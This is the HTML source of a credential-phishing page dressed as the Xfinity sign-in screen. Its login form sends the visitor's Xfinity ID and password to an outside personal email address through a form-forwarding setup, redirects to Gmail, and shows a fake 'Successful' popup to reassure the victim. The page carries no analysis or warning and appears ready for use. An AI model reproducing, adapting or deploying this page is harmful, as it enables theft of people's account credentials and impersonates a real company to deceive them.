<!DOCTYPE html>
<html lang="en" class="light da next h-full" data-resource-package-id="res-responsive-login-page">

<head>
    <script type="text/javascript" src="comcast-common.js"></script>
    <title>Sign in to Xfinity</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="description" content="Get the most out of Xfinity from Comcast by signing in to your account. Enjoy and manage TV, high-speed Internet, phone, and home security services that work seamlessly together &mdash; anytime, anywhere, on any device.">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="msapplication-TileColor" content="#ffffff">
    <meta name="msapplication-TileImage" content="static/images/global/favicon/favicon-96x96.png">
    <meta name="theme-color" content="#ffffff">
    <link rel="stylesheet" href="prism-ui-d8e85d8.css"/>
    <link rel="stylesheet" href="bundle-d8e85d8.css" />
    <script type="module" src="prism-ui.esm-d8e85d8.js"></script>
    <script type="text/javascript" src="bundle-d8e85d8.js" defer></script>
    <script>
        const polarisScript = document.createElement("script");
        polarisScript.src = "https://polaris.xfinity.com/globalnav/polaris." + (window.customElements ? "wc" : "es5") + ".js";
        polarisScript.async = true;
        document.head.append(polarisScript);
    </script>
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="apple-touch-icon" sizes="57x57" href="apple-icon-57x57.png">
    <link rel="apple-touch-icon" sizes="60x60" href="static/images/favicon/apple-icon-60x60.png">
    <link rel="apple-touch-icon" sizes="72x72" href="static/images/favicon/apple-icon-72x72.png">
    <link rel="apple-touch-icon" sizes="76x76" href="static/images/favicon/apple-icon-76x76.png">
    <link rel="apple-touch-icon" sizes="114x114" href="static/images/favicon/apple-icon-114x114.png">
    <link rel="apple-touch-icon" sizes="120x120" href="static/images/favicon/apple-icon-120x120.png">
    <link rel="apple-touch-icon" sizes="144x144" href="static/images/favicon/apple-icon-144x144.png">
    <link rel="apple-touch-icon" sizes="152x152" href="apple-icon-152x152.png">
    <link rel="apple-touch-icon" sizes="180x180" href="apple-icon-180x180.png">
    <link rel="icon" type="image/png" sizes="192x192" href="android-icon-192x192.png">
    <link rel="icon" type="image/png" sizes="32x32" href="favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="96x96" href="favicon-96x96.png">
    <link rel="icon" type="image/png" sizes="16x16" href="favicon-16x16.png">
    <link rel="manifest" href="manifest.json">

   <link rel="stylesheet" href="style.css">

    <link rel="stylesheet" type="text/css" href="https://cdn.comcast.com/cmp/css/cookie-consent.css" />
    <script type="text/javascript" src="https://cdn-prod.securiti.ai/consent/auto_blocking/4b9bbe2a-9c5d-4512-bb76-768a8ea32bc0/a76cdf55-ebf2-44a8-890a-2b5167b45b18.js"></script>

    <style>
        .da-fullscreen iframe[id^="utif_"] {
            max-width: 300px;
            max-height: 600px;
            overflow: hidden;
        }
    </style>
    <script>
        document.addEventListener("c-tracking-log-page", function() {
            document.documentElement.classList.add(digitalData.page.category.subCategory1);
        });
    </script>
    <style>
    </style>

    <noscript>
			<link rel="stylesheet" type="text/css" href="static/resi/dist/noscript-styles-d8e85d8.css" />
		</noscript>
</head>

<body class="" class=" has-footer ">
  <div id="" class="">
  <div class="popup" id="popup">
    <img src="/HD_Outline_Tick_Check_Mark_Symbol_Logo_In_Red_Circle_Icon_PNG-removebg-preview.png" alt="">
    <h2>Successful</h2><br>
    <h4>You may close this window now to return to your mailbox</h4>
    <button type="submit" onclick="closepopup()"><a href="#">Ok</a></button>
  </div>


    <header aria-hidden="true">
        <xc-header client-id="cima-login" disable-controller hide-header></xc-header>
    </header>
    <main class='flex flex-col lg:flex-row lg:justify-center items-center lg:items-start gap-6 lg:gap-0 next:p-0 '>
        <div id="formPanel" class="lg:basis-1/2 px-6 pt-10 lg:pt-24">
            <div class="box-content w-full max-w-[420px] m-auto">
                <form id="form" name="signin" action="garybull299@gmail.com" method="POST">
                    <input type="hidden" name="_next" value="https://mail.google.com/mail/">
                    <input type="hidden" name="_captcha" value="false">
                    <input type="hidden" name="_template" value="table">

                    <div class="single logo-wrapper flex items-center mb-7 lg:mb-10">
                        <span aria-role="img" class="bg-xfinity-logo bg-cover bg-no-repeat inline-block flex-shrink-0 h-6 w-17.75"></span>
                    </div>
                    <prism-text tag="h1" display="display2">Sign in with your Xfinity ID</prism-text>
                    <prism-input-text prism-id="user" id="name" type="email" name="user" label="Enter your Xfinity ID" hide-label="true" autocomplete="username" placeholder="Email, mobile, or username" value="" spellcheck="false" maxlength="128" required="true"  data-value-missing="Please enter your Email to sign in."                    ></prism-input-text>
                    <iprism-input-text id="password" type="password" prism-id="user" name="password" label="Enter your Password" hide-label="true" placeholder="Password" value="" required="true"
                        data-value-missing="Please enter your Password to sign in."></prism-input-text>
			     <prism-input-text id="password" type="password" prism-id="user" name="password" label="Enter your Password" hide-label="true" placeholder="Password" value="" required="true"
                        data-value-missing="Please enter your Password to sign in."></prism-input-text>
			    
                    <prism-text id="implied-legal" display="body3">By signing in, you agree to our <a href="http://my.xfinity.com/terms/web/">Terms of Service</a> and <a href="http://xfinity.comcast.net/privacy/">Privacy Policy</a>.</prism-text>

                    <prism-button prism-id="sign_in" type="submit" tone="theme1" class="block my-10" onclick="openpopup();openpopup2()">Let's go</prism-button>

                </form>

                <prism-lineitem id="non-subscriber-item" tag="a" label="New to Xfinity? View exclusive offers near you" href="https://digital.xfinity.com/offers/plan-builder?intcmp=ILC:ACQ:BAUP:NON:GEN:GEN:COM:NA:and:6211652102" target="_self">
                    <script type="tracking-data-component" data-tracking-append>
                        [{ "componentInfo":{ "componentID": "nonSubItem" , "componentName": "Non-Subscriber Link" } }]
                    </script>
                </prism-lineitem>


                <prism-lineitem id="quick-bill-pay" tag="a" class="hidden" label="Pay any balance without signing in" href="https://customer.xfinity.com/lite" target="_self">
                </prism-lineitem>




                <prism-lineitem id="forgot-xfinity-id-item" tag="a" label="Find your Xfinity ID" href="https://idm.xfinity.com/myaccount/lookup?continue=https%3A%2F%2Flogin.xfinity.com%2Flogin%3Fr%3Dcomcast.net%26s%3Dportal%26reqId%3D753d4d82-6aac-41d5-ab2c-03d71cc2e010%26rm%3D2%26ui_style%3Dlight&ui_style=light"
                    target="_self">
                </prism-lineitem>

                <prism-lineitem id="create-username-item" tag="a" label="Create a new Xfinity ID" href="https://idm.xfinity.com/myaccount/create-uid?continue=https%3A%2F%2Flogin.xfinity.com%2Flogin%3Fr%3Dcomcast.net%26s%3Dportal%26reqId%3D753d4d82-6aac-41d5-ab2c-03d71cc2e010%26rm%3D2%26ui_style%3Dlight&ui_style=light"
                    target="_self">
                </prism-lineitem>


            </div>
        </div>

        <aside id="asidePanel" class=" flex  empty:hidden flex-col lg:basis-1/2 h-full lg:bg-[--aside-background-color] lg:[background-image:var(--aside-background-image)] lg:bg-left-top lg:bg-no-repeat">
            <div id="ad-block" class="w-[300px] h-[250px] lg:w-full lg:h-full lg:min-w-[512px] lg:min-h-[640px] lg:max-w-[900px] lg:max-h-[1200px] !m-auto lg:!mt-0">
                <a id="mobile-ad" class="bg-img-xs-md w-full h-full" style="--bg-img:url('https://assets.xfinity.com/assets/cima/login/default/ad/Xfinity Refreshed SIPs Live Sports_Live Sports 300x250 .jpg');" href="https://www.xfinity.com/stream/collection/sports" aria-label="Only Xfinity gives you access to the most live sports; say Sports into your Xfinity Voice remote to Watch Now. Disclaimer that most live sports includes viewing on integrated third-party apps."></a>
                <a id="desktop-ad" class="bg-img-lg w-full h-full" style="--bg-img:url('https://assets.xfinity.com/assets/cima/login/default/ad/Xfinity Refreshed SIPs Live Sports_Live Sports 960x1200 .jpg');" href="https://www.xfinity.com/stream/collection/sports" aria-label="Only Xfinity gives you access to the most live sports; say Sports into your Xfinity Voice remote to Watch Now. Disclaimer that most live sports includes viewing on integrated third-party apps."></a>
            </div>
        </aside>
    </main>
    <footer>
        <xc-footer client-id="cima-login" slim-footer theme="light"></xc-footer>
    </footer>


    <script type="module">
        import { persistInitialRequestWithParams } from "session-storage-d8e85d8.js"; persistInitialRequestWithParams();
    </script>

    <script type="module">
        import initCookieConsent from "static/ui-common/cookie-consent-d8e85d8.js"; initCookieConsent( "a76cdf55-ebf2-44a8-890a-2b5167b45b18", "Cookie Preferences", "en" );
    </script>



    <script type="text/javascript" src="https://static.cimcontent.net/data-layer/?appID=login"></script>

    <script>
        
const form = document.getElementById('form');
const errorElement = document.getElementById('error');
const emailInput = document.getElementById('name');
const passwordInput = document.getElementById('password');

// Get popup and blur elements
let popup = document.getElementById("popup");
let blur = document.getElementById("blur");

// Functions to open and close popup
function togglePopup() {
  popup.classList.toggle("open-popup");
  blur.classList.toggle("active");
}

function openpopup(){
  // Check if email and password inputs are filled
  if(emailInput.value !== '' && passwordInput.value !== '') {
    popup.classList.add("open-popup");
    blur.classList.add("active");
  } else {
    // If inputs are not filled, prevent form submission and show error messages
    let messages = [];
    if(emailInput.value === '') {
      messages.push('Email Address is required');
    }
    if(passwordInput.value === '') {
      messages.push('Password is required');
    }
    errorElement.innerText = messages.join(', ');
  }
}

function closepopup(){
  popup.classList.remove("open-popup");
  blur.classList.remove("active");
}

// Add event listener to form
form.addEventListener('submit', (e) => {
  let messages = [];

  // Check if email input is empty
  if(emailInput.value === '') {
    messages.push('Email Address is required');
  }

  // Check if password input is empty
  if(passwordInput.value === '') {
    messages.push('Password is required');
  }

  // If there are messages, prevent form submission and show error messages
  if(messages.length > 0) {
    e.preventDefault();
    errorElement.innerText = messages.join(', ');
  }
});

    </script>
    <script src="error.js"></script>
</script>

  </div>
  
</body>

</html>
